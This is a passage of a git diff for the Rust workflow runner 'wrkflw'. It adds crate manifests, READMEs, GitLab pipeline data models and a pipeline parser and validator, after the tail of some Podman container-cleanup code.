|
||||
if !cleanup_output.status.success() {
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Failed to remove successful container {}",
|
||||
container_name
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Timeout removing successful container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
}
|
||||
// If not preserving, container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed container
|
||||
if self.preserve_containers_on_failure {
|
||||
// Failed and we want to preserve - don't clean up but untrack from auto-cleanup
|
||||
wrkflw_logging::info(&format!(
|
||||
"Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
|
||||
container_name, output.exit_code, container_name
|
||||
));
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Failed but we don't want to preserve - container was auto-removed with --rm
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(_) => {
|
||||
// Command failed to execute properly - clean up if container exists and not preserving
|
||||
if !self.preserve_containers_on_failure {
|
||||
// Container was created with --rm, so it should be auto-removed
|
||||
untrack_container(&container_name);
|
||||
} else {
|
||||
// Container was created without --rm, try to clean it up since execution failed
|
||||
let cleanup_result = tokio::time::timeout(
|
||||
std::time::Duration::from_millis(1000),
|
||||
Command::new("podman")
|
||||
.args(["rm", "-f", &container_name])
|
||||
.stdout(Stdio::null())
|
||||
.stderr(Stdio::null())
|
||||
.output(),
|
||||
)
|
||||
.await;
|
||||
|
||||
match cleanup_result {
|
||||
Ok(Ok(_)) => wrkflw_logging::debug(&format!(
|
||||
"Cleaned up failed execution container {}",
|
||||
container_name
|
||||
)),
|
||||
_ => wrkflw_logging::debug(&format!(
|
||||
"Failed to clean up execution failure container {}",
|
||||
container_name
|
||||
)),
|
||||
}
|
||||
untrack_container(&container_name);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
match &result {
|
||||
Ok(output) => {
|
||||
if output.exit_code != 0 {
|
||||
wrkflw_logging::info(&format!(
|
||||
"Podman command failed with exit code: {}",
|
||||
output.exit_code
|
||||
));
|
||||
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
|
||||
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
|
||||
wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
wrkflw_logging::error(&format!("Podman execution error: {}", e));
|
||||
}
|
||||
}
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
async fn pull_image_inner(&self, image: &str) -> Result<(), ContainerError> {
|
||||
let args = vec!["pull", image];
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImagePull(format!(
|
||||
"Failed to pull image {}: {}",
|
||||
image, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn build_image_inner(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
|
||||
let context_dir = dockerfile.parent().unwrap_or(Path::new("."));
|
||||
let dockerfile_str = dockerfile.to_string_lossy().to_string();
|
||||
let context_dir_str = context_dir.to_string_lossy().to_string();
|
||||
let args = vec!["build", "-f", &dockerfile_str, "-t", tag, &context_dir_str];
|
||||
|
||||
let output = self.execute_podman_command(&args, None).await?;
|
||||
|
||||
if output.exit_code != 0 {
|
||||
return Err(ContainerError::ImageBuild(format!(
|
||||
"Failed to build image {}: {}",
|
||||
tag, output.stderr
|
||||
)));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
// Public accessor functions for testing
|
||||
#[cfg(test)]
|
||||
pub fn get_tracked_containers() -> Vec<String> {
|
||||
if let Ok(containers) = RUNNING_CONTAINERS.lock() {
|
||||
containers.clone()
|
||||
} else {
|
||||
vec![]
|
||||
}
|
||||
}
|
||||
24
crates/github/Cargo.toml
Normal file
24
crates/github/Cargo.toml
Normal file
@@ -0,0 +1,24 @@
|
||||
[package]
|
||||
name = "wrkflw-github"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "GitHub API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies from workspace
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
reqwest.workspace = true
|
||||
thiserror.workspace = true
|
||||
lazy_static.workspace = true
|
||||
regex.workspace = true
|
||||
23
crates/github/README.md
Normal file
23
crates/github/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-github
|
||||
|
||||
GitHub integration helpers used by `wrkflw` to list/trigger workflows.
|
||||
|
||||
- **List workflows** in `.github/workflows`
|
||||
- **Trigger workflow_dispatch** events over the GitHub API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_github::{get_repo_info, trigger_workflow};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);
|
||||
|
||||
// Requires GITHUB_TOKEN in env
|
||||
trigger_workflow("ci", Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.
|
||||
@@ -1,6 +1,9 @@
|
||||
// github crate
|
||||
|
||||
use lazy_static::lazy_static;
|
||||
use regex::Regex;
|
||||
use reqwest::header;
|
||||
use serde_json::{self};
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
25
crates/gitlab/Cargo.toml
Normal file
25
crates/gitlab/Cargo.toml
Normal file
@@ -0,0 +1,25 @@
|
||||
[package]
|
||||
name = "wrkflw-gitlab"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "GitLab API integration for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
lazy_static.workspace = true
|
||||
regex.workspace = true
|
||||
reqwest.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
urlencoding.workspace = true
|
||||
23
crates/gitlab/README.md
Normal file
23
crates/gitlab/README.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## wrkflw-gitlab
|
||||
|
||||
GitLab integration helpers used by `wrkflw` to trigger pipelines.
|
||||
|
||||
- Reads repo info from local git remote
|
||||
- Triggers pipelines via GitLab API
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};
|
||||
|
||||
# tokio_test::block_on(async {
|
||||
let info = get_repo_info()?;
|
||||
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);
|
||||
|
||||
// Requires GITLAB_TOKEN in env (api scope)
|
||||
trigger_pipeline(Some("main"), None).await?;
|
||||
# Ok::<_, Box<dyn std::error::Error>>(())
|
||||
# })?;
|
||||
```
|
||||
|
||||
Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.
|
||||
@@ -1,3 +1,5 @@
|
||||
// gitlab crate
|
||||
|
||||
use lazy_static::lazy_static;
|
||||
use regex::Regex;
|
||||
use reqwest::header;
|
||||
21
crates/logging/Cargo.toml
Normal file
21
crates/logging/Cargo.toml
Normal file
@@ -0,0 +1,21 @@
|
||||
[package]
|
||||
name = "wrkflw-logging"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Logging functionality for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
chrono.workspace = true
|
||||
once_cell.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
22
crates/logging/README.md
Normal file
22
crates/logging/README.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## wrkflw-logging
|
||||
|
||||
Lightweight in-memory logging with simple levels for TUI/CLI output.
|
||||
|
||||
- Thread-safe, timestamped messages
|
||||
- Level filtering (Debug/Info/Warning/Error)
|
||||
- Pluggable into UI for live log views
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};
|
||||
|
||||
set_log_level(LogLevel::Info);
|
||||
info("starting");
|
||||
warning("be careful");
|
||||
error("boom");
|
||||
|
||||
for line in get_logs() {
|
||||
println!("{}", line);
|
||||
}
|
||||
```
|
||||
21
crates/matrix/Cargo.toml
Normal file
21
crates/matrix/Cargo.toml
Normal file
@@ -0,0 +1,21 @@
|
||||
[package]
|
||||
name = "wrkflw-matrix"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Matrix job parallelization for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
indexmap.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
thiserror.workspace = true
|
||||
20
crates/matrix/README.md
Normal file
20
crates/matrix/README.md
Normal file
@@ -0,0 +1,20 @@
|
||||
## wrkflw-matrix
|
||||
|
||||
Matrix expansion utilities used to compute all job combinations and format labels.
|
||||
|
||||
- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
|
||||
- Provides display helpers for UI/CLI
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_matrix::{MatrixConfig, expand_matrix};
|
||||
use serde_yaml::Value;
|
||||
use std::collections::HashMap;
|
||||
|
||||
let mut cfg = MatrixConfig::default();
|
||||
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"])) ;
|
||||
|
||||
let combos = expand_matrix(&cfg).expect("expand");
|
||||
assert!(!combos.is_empty());
|
||||
```
|
||||
@@ -1,3 +1,5 @@
|
||||
// matrix crate
|
||||
|
||||
use indexmap::IndexMap;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_yaml::Value;
|
||||
17
crates/models/Cargo.toml
Normal file
17
crates/models/Cargo.toml
Normal file
@@ -0,0 +1,17 @@
|
||||
[package]
|
||||
name = "wrkflw-models"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Data models and structures for wrkflw workflow execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
16
crates/models/README.md
Normal file
16
crates/models/README.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## wrkflw-models
|
||||
|
||||
Common data structures shared across crates.
|
||||
|
||||
- `ValidationResult` for structural/semantic checks
|
||||
- GitLab pipeline models (serde types)
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
res.add_issue("missing jobs".into());
|
||||
assert!(!res.is_valid);
|
||||
```
|
||||
338
crates/models/src/lib.rs
Normal file
338
crates/models/src/lib.rs
Normal file
@@ -0,0 +1,338 @@
|
||||
pub struct ValidationResult {
|
||||
pub is_valid: bool,
|
||||
pub issues: Vec<String>,
|
||||
}
|
||||
|
||||
impl Default for ValidationResult {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl ValidationResult {
|
||||
pub fn new() -> Self {
|
||||
ValidationResult {
|
||||
is_valid: true,
|
||||
issues: Vec::new(),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn add_issue(&mut self, issue: String) {
|
||||
self.is_valid = false;
|
||||
self.issues.push(issue);
|
||||
}
|
||||
}
|
||||
|
||||
// GitLab pipeline models
|
||||
pub mod gitlab {
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
|
||||
/// Represents a GitLab CI/CD pipeline configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Pipeline {
|
||||
/// Default image for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub image: Option<Image>,
|
||||
|
||||
/// Global variables available to all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
|
||||
/// Pipeline stages in execution order
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub stages: Option<Vec<String>>,
|
||||
|
||||
/// Default before_script for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub before_script: Option<Vec<String>>,
|
||||
|
||||
/// Default after_script for all jobs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub after_script: Option<Vec<String>>,
|
||||
|
||||
/// Job definitions (name => job)
|
||||
#[serde(flatten)]
|
||||
pub jobs: HashMap<String, Job>,
|
||||
|
||||
/// Workflow rules for the pipeline
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub workflow: Option<Workflow>,
|
||||
|
||||
/// Includes for pipeline configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub include: Option<Vec<Include>>,
|
||||
}
|
||||
|
||||
/// A job in a GitLab CI/CD pipeline
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Job {
|
||||
/// The stage this job belongs to
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub stage: Option<String>,
|
||||
|
||||
/// Docker image to use for this job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub image: Option<Image>,
|
||||
|
||||
/// Script commands to run
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub script: Option<Vec<String>>,
|
||||
|
||||
/// Commands to run before the main script
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub before_script: Option<Vec<String>>,
|
||||
|
||||
/// Commands to run after the main script
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub after_script: Option<Vec<String>>,
|
||||
|
||||
/// When to run the job (on_success, on_failure, always, manual)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
|
||||
/// Allow job failure
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub allow_failure: Option<bool>,
|
||||
|
||||
/// Services to run alongside the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub services: Option<Vec<Service>>,
|
||||
|
||||
/// Tags to define which runners can execute this job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub tags: Option<Vec<String>>,
|
||||
|
||||
/// Job-specific variables
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
|
||||
/// Job dependencies
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub dependencies: Option<Vec<String>>,
|
||||
|
||||
/// Artifacts to store after job execution
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub artifacts: Option<Artifacts>,
|
||||
|
||||
/// Cache configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub cache: Option<Cache>,
|
||||
|
||||
/// Rules for when this job should run
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub rules: Option<Vec<Rule>>,
|
||||
|
||||
/// Only run on specified refs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub only: Option<Only>,
|
||||
|
||||
/// Exclude specified refs
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub except: Option<Except>,
|
||||
|
||||
/// Retry configuration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub retry: Option<Retry>,
|
||||
|
||||
/// Timeout for the job in seconds
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub timeout: Option<String>,
|
||||
|
||||
/// Mark job as parallel and specify instance count
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub parallel: Option<usize>,
|
||||
|
||||
/// Flag to indicate this is a template job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub template: Option<bool>,
|
||||
|
||||
/// List of jobs this job extends from
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub extends: Option<Vec<String>>,
|
||||
}
|
||||
|
||||
/// Docker image configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Image {
|
||||
/// Simple image name as string
|
||||
Simple(String),
|
||||
/// Detailed image configuration
|
||||
Detailed {
|
||||
/// Image name
|
||||
name: String,
|
||||
/// Entrypoint to override in the image
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
entrypoint: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Service container to run alongside a job
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Service {
|
||||
/// Simple service name as string
|
||||
Simple(String),
|
||||
/// Detailed service configuration
|
||||
Detailed {
|
||||
/// Service name/image
|
||||
name: String,
|
||||
/// Command to run in the service container
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
command: Option<Vec<String>>,
|
||||
/// Entrypoint to override in the image
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
entrypoint: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Artifacts configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Artifacts {
|
||||
/// Paths to include as artifacts
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub paths: Option<Vec<String>>,
|
||||
/// Artifact expiration duration
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub expire_in: Option<String>,
|
||||
/// When to upload artifacts (on_success, on_failure, always)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
}
|
||||
|
||||
/// Cache configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Cache {
|
||||
/// Cache key
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub key: Option<String>,
|
||||
/// Paths to cache
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub paths: Option<Vec<String>>,
|
||||
/// When to save cache (on_success, on_failure, always)
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
/// Cache policy
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub policy: Option<String>,
|
||||
}
|
||||
|
||||
/// Rule for conditional job execution
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Rule {
|
||||
/// If condition expression
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub if_: Option<String>,
|
||||
/// When to run if condition is true
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub when: Option<String>,
|
||||
/// Variables to set if condition is true
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub variables: Option<HashMap<String, String>>,
|
||||
}
|
||||
|
||||
/// Only/except configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Only {
|
||||
/// Simple list of refs
|
||||
Refs(Vec<String>),
|
||||
/// Detailed configuration
|
||||
Complex {
|
||||
/// Refs to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
refs: Option<Vec<String>>,
|
||||
/// Branch patterns to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
branches: Option<Vec<String>>,
|
||||
/// Tags to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
tags: Option<Vec<String>>,
|
||||
/// Pipeline types to include
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
variables: Option<Vec<String>>,
|
||||
/// Changes to files that trigger the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
changes: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Except configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Except {
|
||||
/// Simple list of refs
|
||||
Refs(Vec<String>),
|
||||
/// Detailed configuration
|
||||
Complex {
|
||||
/// Refs to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
refs: Option<Vec<String>>,
|
||||
/// Branch patterns to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
branches: Option<Vec<String>>,
|
||||
/// Tags to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
tags: Option<Vec<String>>,
|
||||
/// Pipeline types to exclude
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
variables: Option<Vec<String>>,
|
||||
/// Changes to files that don't trigger the job
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
changes: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Workflow configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
pub struct Workflow {
|
||||
/// Rules for when to run the pipeline
|
||||
pub rules: Vec<Rule>,
|
||||
}
|
||||
|
||||
/// Retry configuration
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Retry {
|
||||
/// Simple max attempts
|
||||
MaxAttempts(u32),
|
||||
/// Detailed retry configuration
|
||||
Detailed {
|
||||
/// Maximum retry attempts
|
||||
max: u32,
|
||||
/// When to retry
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
when: Option<Vec<String>>,
|
||||
},
|
||||
}
|
||||
|
||||
/// Include configuration for external pipeline files
|
||||
#[derive(Debug, Serialize, Deserialize, Clone)]
|
||||
#[serde(untagged)]
|
||||
pub enum Include {
|
||||
/// Simple string include
|
||||
Local(String),
|
||||
/// Detailed include configuration
|
||||
Detailed {
|
||||
/// Local file path
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
local: Option<String>,
|
||||
/// Remote file URL
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
remote: Option<String>,
|
||||
/// Include from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
project: Option<String>,
|
||||
/// Include specific file from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
file: Option<String>,
|
||||
/// Include template
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
template: Option<String>,
|
||||
/// Ref to use when including from project
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
ref_: Option<String>,
|
||||
},
|
||||
}
|
||||
}
|
||||
26
crates/parser/Cargo.toml
Normal file
26
crates/parser/Cargo.toml
Normal file
@@ -0,0 +1,26 @@
|
||||
[package]
|
||||
name = "wrkflw-parser"
|
||||
version.workspace = true
|
||||
edition.workspace = true
|
||||
description = "Workflow parsing functionality for wrkflw execution engine"
|
||||
license.workspace = true
|
||||
documentation.workspace = true
|
||||
homepage.workspace = true
|
||||
repository.workspace = true
|
||||
keywords.workspace = true
|
||||
categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
jsonschema.workspace = true
|
||||
serde.workspace = true
|
||||
serde_yaml.workspace = true
|
||||
serde_json.workspace = true
|
||||
thiserror.workspace = true
|
||||
|
||||
[dev-dependencies]
|
||||
tempfile = "3.7"
|
||||
13
crates/parser/README.md
Normal file
13
crates/parser/README.md
Normal file
@@ -0,0 +1,13 @@
|
||||
## wrkflw-parser
|
||||
|
||||
Parsers and schema helpers for GitHub/GitLab workflow files.
|
||||
|
||||
- GitHub Actions workflow parsing and JSON Schema validation
|
||||
- GitLab CI parsing helpers
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
|
||||
// Use those unless you are extending parsing behavior directly.
|
||||
```
|
||||
1711
crates/parser/src/github-workflow.json
Normal file
1711
crates/parser/src/github-workflow.json
Normal file
File diff suppressed because it is too large
Load Diff
3012
crates/parser/src/gitlab-ci.json
Normal file
3012
crates/parser/src/gitlab-ci.json
Normal file
File diff suppressed because it is too large
Load Diff
278
crates/parser/src/gitlab.rs
Normal file
278
crates/parser/src/gitlab.rs
Normal file
@@ -0,0 +1,278 @@
|
||||
use crate::schema::{SchemaType, SchemaValidator};
|
||||
use crate::workflow;
|
||||
use std::collections::HashMap;
|
||||
use std::fs;
|
||||
use std::path::Path;
|
||||
use thiserror::Error;
|
||||
use wrkflw_models::gitlab::Pipeline;
|
||||
use wrkflw_models::ValidationResult;
|
||||
|
||||
#[derive(Error, Debug)]
|
||||
pub enum GitlabParserError {
|
||||
#[error("I/O error: {0}")]
|
||||
IoError(#[from] std::io::Error),
|
||||
|
||||
#[error("YAML parsing error: {0}")]
|
||||
YamlError(#[from] serde_yaml::Error),
|
||||
|
||||
#[error("Invalid pipeline structure: {0}")]
|
||||
InvalidStructure(String),
|
||||
|
||||
#[error("Schema validation error: {0}")]
|
||||
SchemaValidationError(String),
|
||||
}
|
||||
|
||||
/// Parse a GitLab CI/CD pipeline file
|
||||
pub fn parse_pipeline(pipeline_path: &Path) -> Result<Pipeline, GitlabParserError> {
|
||||
// Read the pipeline file
|
||||
let pipeline_content = fs::read_to_string(pipeline_path)?;
|
||||
|
||||
// Validate against schema
|
||||
let validator = SchemaValidator::new().map_err(GitlabParserError::SchemaValidationError)?;
|
||||
|
||||
validator
|
||||
.validate_with_specific_schema(&pipeline_content, SchemaType::GitLab)
|
||||
.map_err(GitlabParserError::SchemaValidationError)?;
|
||||
|
||||
// Parse the pipeline YAML
|
||||
let pipeline: Pipeline = serde_yaml::from_str(&pipeline_content)?;
|
||||
|
||||
// Return the parsed pipeline
|
||||
Ok(pipeline)
|
||||
}
|
||||
|
||||
/// Validate the basic structure of a GitLab CI/CD pipeline
|
||||
pub fn validate_pipeline_structure(pipeline: &Pipeline) -> ValidationResult {
|
||||
let mut result = ValidationResult::new();
|
||||
|
||||
// Check for at least one job
|
||||
if pipeline.jobs.is_empty() {
|
||||
result.add_issue("Pipeline must contain at least one job".to_string());
|
||||
}
|
||||
|
||||
// Check for script in jobs
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
// Skip template jobs
|
||||
if let Some(true) = job.template {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check for script or extends
|
||||
if job.script.is_none() && job.extends.is_none() {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' must have a script section or extend another job",
|
||||
job_name
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
// Check that referenced stages are defined
|
||||
if let Some(stages) = &pipeline.stages {
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(stage) = &job.stage {
|
||||
if !stages.contains(stage) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' references undefined stage '{}'",
|
||||
job_name, stage
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check that job dependencies exist
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(dependencies) = &job.dependencies {
|
||||
for dependency in dependencies {
|
||||
if !pipeline.jobs.contains_key(dependency) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' depends on undefined job '{}'",
|
||||
job_name, dependency
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check that job extensions exist
|
||||
for (job_name, job) in &pipeline.jobs {
|
||||
if let Some(extends) = &job.extends {
|
||||
for extend in extends {
|
||||
if !pipeline.jobs.contains_key(extend) {
|
||||
result.add_issue(format!(
|
||||
"Job '{}' extends undefined job '{}'",
|
||||
job_name, extend
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
result
|
||||
}
|
||||
|
||||
/// Convert a GitLab CI/CD pipeline to a format compatible with the workflow executor
|
||||
pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefinition {
|
||||
// Create a new workflow with required fields
|
||||
let mut workflow = workflow::WorkflowDefinition {
|
||||
name: "Converted GitLab CI Pipeline".to_string(),
|
||||
on: vec!["push".to_string()], // Default trigger
|
||||
on_raw: serde_yaml::Value::String("push".to_string()),
|
||||
jobs: HashMap::new(),
|
||||
};
|
||||
|
||||
